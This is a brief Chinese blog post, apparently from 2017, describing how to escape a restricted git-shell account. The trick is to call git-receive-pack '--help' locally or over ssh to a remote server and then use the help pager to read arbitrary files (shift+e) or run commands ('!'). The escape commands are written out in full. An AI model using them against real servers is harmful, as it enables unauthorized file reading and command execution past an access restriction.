Git Shell Bypass

通过git读文件:

git-receive-pack '--help' #本地
ssh git@remoteserver "git-receive-pack '--help'" #远程服务器

打开以后按shift+e,然后输入要读的文件路径

1.gif

通过git执行命令:

git-receive-pack '--help' #本地
ssh git@remoteserver "git-receive-pack '--help'" #远程服务器

输入!后输入要执行的命令:
2.gif

详情:戳我

最后由 Evi1cg 编辑于2017年05月11日 10:58